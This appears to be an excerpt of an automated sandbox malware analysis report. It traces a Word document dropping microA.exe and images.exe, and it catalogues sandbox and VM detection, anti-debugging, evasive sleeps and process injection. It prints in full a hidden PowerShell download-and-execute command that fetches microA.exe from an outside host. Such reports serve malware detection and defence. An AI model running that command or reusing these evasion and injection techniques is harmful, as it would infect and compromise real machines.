Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\images.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168149426.000000000220B000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00261DB0 rdtsc 12_2_00261DB0
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_000007FF00280EDC sldt word ptr [eax] 6_2_000007FF00280EDC
Contains functionality to enumerate running services
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW, 16_2_0040D8FB
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW, 17_2_0040D8FB
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW, 18_2_0040D8FB
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW, 25_2_0040D8FB
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3 occurrences)
Source: C:\Users\user\AppData\Roaming\microA.exe Thread delayed: delay time: 922337203685477 (3 occurrences)
Source: C:\ProgramData\images.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 398
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\images.exe Dropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dll
Source: C:\Users\user\AppData\Local\Temp\images.exe Dropped PE file which has not been started: C:\Windows\System32\rfxvmt.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3044 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1288 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2316 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2296 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 2412 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 2264 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 660 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 1772 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\microA.exe TID: 2988 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microA.exe TID: 2396 Thread sleep count: 70 > 30
Source: C:\Users\user\AppData\Local\Temp\microA.exe TID: 1360 Thread sleep count: 70 > 30
Source: C:\Users\user\AppData\Local\Temp\microA.exe TID: 2420 Thread sleep count: 70 > 30
Source: C:\ProgramData\images.exe TID: 2476 Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\images.exe TID: 2328 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\images.exe TID: 2176 Thread sleep count: 70 > 30
Source: C:\Users\user\AppData\Local\Temp\images.exe TID: 1948 Thread sleep time: -420000s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 1980 Thread sleep count: 398 > 30
Source: C:\Windows\SysWOW64\cmd.exe TID: 1980 Thread sleep time: -4776000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00411446 FindFirstFileW,FindNextFileW, 16_2_00411446
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 16_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00411446 FindFirstFileW,FindNextFileW, 17_2_00411446
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 17_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00411446 FindFirstFileW,FindNextFileW, 18_2_00411446
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 18_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00411446 FindFirstFileW,FindNextFileW, 25_2_00411446
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 25_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW, 16_2_0041154A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3 occurrences)
Source: C:\Users\user\AppData\Roaming\microA.exe Thread delayed: delay time: 922337203685477 (3 occurrences)
Source: C:\ProgramData\images.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: microA.exe, 0000000B.00000002.2168149426.000000000220B000.00000004.00000001.sdmp Binary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: microA.exe, 0000000A.00000002.2168876756.0000000002F39000.00000004.00000001.sdmp Binary or memory string: OaUqUQEMueYeU
Source: microA.exe, 0000000B.00000002.2168149426.000000000220B000.00000004.00000001.sdmp Binary or memory string: vmware
Source: images.exe, 00000017.00000000.2226414690.0000000000152000.00000020.00020000.sdmp Binary or memory string: 1/bkonSBjFeFLKXWUtKcuMsJfafv/KAmzvDO1gn15d2fgItYXzZWwdtJzZG+2XOUlSGDvpEd6QhXtyPSF4+S7umci4l25G+x9rQVMciP5sIWruMYRq2CpuILtnKHm0AvaDpJXRdU86Ek
Source: powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: microA.exe, 0000000B.00000002.2168149426.000000000220B000.00000004.00000001.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: microA.exe, 0000000A.00000002.2168876756.0000000002F39000.00000004.00000001.sdmp Binary or memory string: eZf1/bkonSBjFeFLKXWUtKcuMsJfafv/KAmzvDO1gn15d2fgItYXzZWwdtJzZG+2XOUlSGDvpEd6QhXtyPSF4+S7umci4l25G+x9rQVMciP5sIWruMYRq2CpuILtnKHm0AvaDpJXRdU86Ek
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00261DB0 rdtsc 12_2_00261DB0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC81D5 LdrInitializeThunk, 25_2_03BC81D5
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess, 16_2_004060B0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00426222 mov eax, dword ptr fs:[00000030h] 16_2_00426222
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0041EB27 mov eax, dword ptr fs:[00000030h] 16_2_0041EB27
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00411B38 mov eax, dword ptr fs:[00000030h] 16_2_00411B38
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00411B3F mov eax, dword ptr fs:[00000030h] 16_2_00411B3F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00411E6D mov eax, dword ptr fs:[00000030h] 16_2_00411E6D
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00426222 mov eax, dword ptr fs:[00000030h] 17_2_00426222
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0041EB27 mov eax, dword ptr fs:[00000030h] 17_2_0041EB27
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00411B38 mov eax, dword ptr fs:[00000030h] 17_2_00411B38
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00411B3F mov eax, dword ptr fs:[00000030h] 17_2_00411B3F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00411E6D mov eax, dword ptr fs:[00000030h] 17_2_00411E6D
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00426222 mov eax, dword ptr fs:[00000030h] 18_2_00426222
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0041EB27 mov eax, dword ptr fs:[00000030h] 18_2_0041EB27
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00411B38 mov eax, dword ptr fs:[00000030h] 18_2_00411B38
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00411B3F mov eax, dword ptr fs:[00000030h] 18_2_00411B3F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00411E6D mov eax, dword ptr fs:[00000030h] 18_2_00411E6D
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00426222 mov eax, dword ptr fs:[00000030h] 25_2_00426222
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0041EB27 mov eax, dword ptr fs:[00000030h] 25_2_0041EB27
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00411B38 mov eax, dword ptr fs:[00000030h] 25_2_00411B38
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00411B3F mov eax, dword ptr fs:[00000030h] 25_2_00411B3F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00411E6D mov eax, dword ptr fs:[00000030h] 25_2_00411E6D
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00406045 GetProcessHeap,RtlAllocateHeap, 16_2_00406045
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\microA.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\microA.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\microA.exe Process token adjusted: Debug
Source: C:\ProgramData\images.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\images.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BB6118 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 25_2_03BB6118
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\images.exe Memory allocated: C:\Users\user\AppData\Local\Temp\images.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\images.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 120000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\images.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 130000 protect: page read and write
Bypasses PowerShell execution policy
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Contains functionality to inject threads in other processes
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 16_2_00407B2E
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 16_2_00407D5E
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 16_2_00413F7F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 17_2_00407B2E
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 17_2_00407D5E
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 17_2_00413F7F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 18_2_00407B2E
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 18_2_00407D5E
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 18_2_00413F7F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 25_2_00413F7F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 25_2_00407B2E
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 25_2_00407D5E
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\images.exe Thread created: C:\Windows\SysWOW64\cmd.exe EIP: 12010E
Injects a PE file into a foreign process
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 400000 value starts with: 4D5A
Injects files into Windows application
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Injected file: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT was created by C:\Users\user\AppData\Roaming\microA.exe
Source: C:\Windows\System32\notepad.exe Injected file: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 401000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 417000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 41C000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55B000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55D000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 7EFDE008
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 401000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 417000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 41C000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55B000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55D000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 7EFDE008
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 400000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 401000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 417000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 41C000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55B000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 55D000
Source: C:\Users\user\AppData\Roaming\microA.exe Memory written: C:\Users\user\AppData\Local\Temp\microA.exe base: 7EFDE008
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 400000
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 401000
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 417000
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 41C000
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 55B000
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 55D000
Source: C:\ProgramData\images.exe Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 7EFDE008
